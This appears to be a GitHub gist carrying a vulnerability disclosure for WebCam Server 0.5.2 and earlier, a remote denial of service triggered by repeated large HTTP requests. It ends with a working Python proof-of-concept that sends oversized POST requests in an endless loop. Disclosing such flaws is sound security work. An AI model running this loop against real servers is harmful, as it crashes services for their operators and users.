Skip to content

Instantly share code, notes, and snippets.

@0xHop
Created December 15, 2021 02:21
Embed
What would you like to do?
WebCam Server v0.5.2 Denial of Service
[description]
WebcamServer version 0.5.2 and previous does not properly handle clean up memory when receiving HTTP requests. Multiple large requests will trigger an unhandled Structured Exception Handler which will result in an application crash.
------------------------------------------
[VulnerabilityType Other]
Denial of Service
------------------------------------------
[Vendor of Product]
en3rgy
------------------------------------------
[Affected Product Code Base]
Webcam Server 0.5.2 and below
------------------------------------------
[Affected Component]
Webcam Server process
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
False
------------------------------------------
[Impact Escalation of Privileges]
False
------------------------------------------
[Impact Information Disclosure]
False
------------------------------------------
[Attack Vectors]
Repeated large HTTP Requests
------------------------------------------
[Reference]
https://sourceforge.net/projects/webcamserv/
------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]
false
------------------------------------------
import socket
import sys
ip = "127.0.0.1"
port = 80
while True:
buffer = b"A" * 8000
request = b"POST " + buffer + b" HTTP 1.1"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(request)
s.close()
print("sending packet")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment